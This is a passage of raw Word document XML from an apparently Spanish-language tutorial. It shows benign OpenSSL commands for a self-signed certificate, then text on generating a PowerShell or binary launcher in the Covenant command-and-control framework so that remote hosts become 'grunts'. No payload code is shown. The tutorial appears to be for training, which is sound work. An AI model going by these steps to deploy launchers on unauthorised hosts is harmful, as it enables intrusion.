                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t>openssl req -new -key myserver.key -out myserver.csr</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="12EDBE30" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="45A5E0A6" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t># Genera un certificado SSL autofirmado de un año</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="07A81667" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t>openssl x509 -req -days 365 -in myserver.csr -signkey myserver.key -out myserver.crt</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="56701594" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="24F8B665" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t># Ve los detalles del certificado</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7479FC2E" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t>openssl x509 -in myserver.crt -text</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="06CC7975" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="6D5C4402" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t># Copia los archivos clave y certificado en un directorio "ssl"</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="07A9FE03" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t>mkdir ssl</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1F82612E" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t>cp myserver.key ssl/</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="67D6DC01" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t>cp myserver.crt ssl/</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="38C2F857" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="2ABE039D" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t># Cambia los permisos del directorio y los archivos</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="569D67FD" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t>chmod 700 ssl</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="6FAB3976" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t>chmod 600 ssl/myserver.key</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="16C85AEE" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t>chmod 644 ssl/myserver.crt</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1F552811" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="20EED238" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t xml:space="preserve"># Muestra donde se guardaron los archivos </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0503711C" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t xml:space="preserve">echo "Los archivos clave y certificado se guardaron en:" </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7016EC93" w14:textId="77777777" w:rsidR="00D62AA6" w:rsidRPr="004701B5" w:rsidRDefault="00D62AA6" w:rsidP="00D62AA6">
                      <w:pPr>
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="004701B5">
                        <w:rPr>
                          <w:color w:val="7030A0"/>
                          <w:sz w:val="16"/>
                          <w:szCs w:val="16"/>
                        </w:rPr>
                        <w:t>pwd/ssl</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="67BA759D" w14:textId="3B06D748" w:rsidR="0063792B" w:rsidRDefault="0063792B"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="72770D21" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="181B1CDC" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05A6451D" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B1C45DB" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06816E24" w14:textId="77777777" w:rsidR="007B3349" w:rsidRDefault="007B3349" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="388155E5" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CF6E213" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="764C47A4" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5AF2E93B" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02271559" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11078060" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="438DFD0E" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F9D23E1" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF78727" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FDC03BA" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FE151A7" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66FDAC56" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EEF7908" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70F8DCAE" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7AD58624" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E5BCB44" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10B532E3" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0694FCB4" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="794A5E9B" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3551B10C" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C1948FE" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A835A76" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C7B324" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C7C6F5" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F46ABB0" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00B09572" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48E8D422" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3892A601" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B00D9FE" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B05E4BC" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D2D8A15" w14:textId="03EEB5F4" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="77C70437" wp14:editId="5B7C1F0D">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="163827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4100" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId270"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496D9E1D" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA5DB9E" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="537EA7C0" w14:textId="0FB1EEE6" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="382699D7" wp14:editId="7339A02F">
            <wp:extent cx="5400040" cy="5400040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="49330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176" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId271"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4B101A9E" w14:textId="77777777" w:rsidR="0063792B" w:rsidRDefault="0063792B" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3E1056" w14:textId="5AD33812" w:rsidR="0063792B" w:rsidRDefault="000A14B7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="741AF695" wp14:editId="6C2808FF">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1098257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7206" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId272"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0866ECC1" w14:textId="77777777" w:rsidR="000A14B7" w:rsidRDefault="000A14B7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D8EBC8E" w14:textId="50EF6C49" w:rsidR="000A14B7" w:rsidRDefault="000A14B7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C19FE58" wp14:editId="7F471130">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1111892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2843" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId273"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02C7B19C" w14:textId="77777777" w:rsidR="000A14B7" w:rsidRDefault="000A14B7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4475899B" w14:textId="3C57F673" w:rsidR="006964F4" w:rsidRDefault="00F04517" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>A continuación</w:t>
      </w:r>
      <w:r w:rsidR="006964F4">
        <w:t xml:space="preserve"> tendremos que crear un lanzador. Los lanzadores se utilizan para convertir los hosts remotos en grunts y conectarlos a la aplicación de Covenant. Por lo general, vienen en forma de paquete de carga útil que se ejecuta en un host remoto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2170C102" w14:textId="2F31CBA9" w:rsidR="006964F4" w:rsidRDefault="006964F4" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Cada lanzador esta emparejado a un oyente.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2002ADFA" w14:textId="77777777" w:rsidR="00560EBD" w:rsidRDefault="00560EBD" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01C388F1" w14:textId="09EE54DF" w:rsidR="0063792B" w:rsidRDefault="00560EBD" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="173A9D8C" wp14:editId="0D38449D">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="678165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5013" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId274"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02352783" w14:textId="77777777" w:rsidR="00560EBD" w:rsidRDefault="00560EBD" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2724DB55" w14:textId="02B46860" w:rsidR="00E211C7" w:rsidRDefault="00E211C7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Para esta caso vamos elegir Powershell.exe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F053280" w14:textId="77777777" w:rsidR="00E211C7" w:rsidRDefault="00E211C7" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79775C68" w14:textId="57600E15" w:rsidR="00E211C7" w:rsidRDefault="0018374A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B091432" wp14:editId="563EBAA0">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1215235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5354" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId275"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3A2BF547" w14:textId="77777777" w:rsidR="0018374A" w:rsidRDefault="0018374A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56D72A1B" w14:textId="65166B2D" w:rsidR="0018374A" w:rsidRDefault="0018374A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>Y le daremos a generar:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B721191" w14:textId="77777777" w:rsidR="0018374A" w:rsidRDefault="0018374A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08497336" w14:textId="56FE51C2" w:rsidR="0018374A" w:rsidRDefault="0018374A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="759373B0" wp14:editId="5206C19D">
            <wp:extent cx="5400040" cy="2719705"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="1146583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83252" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId276"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3FEE71DE" w14:textId="77777777" w:rsidR="0018374A" w:rsidRDefault="0018374A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CF297D9" w14:textId="49432C3E" w:rsidR="0018374A" w:rsidRDefault="0018374A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:t>O con un binario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD9DFE8" w14:textId="77777777" w:rsidR="0018374A" w:rsidRDefault="0018374A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CCA47D9" w14:textId="0D51FFE4" w:rsidR="0018374A" w:rsidRDefault="0018374A" w:rsidP="001F5E0C">
      <w:pPr>
        <w:pStyle w:val="Contenido"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
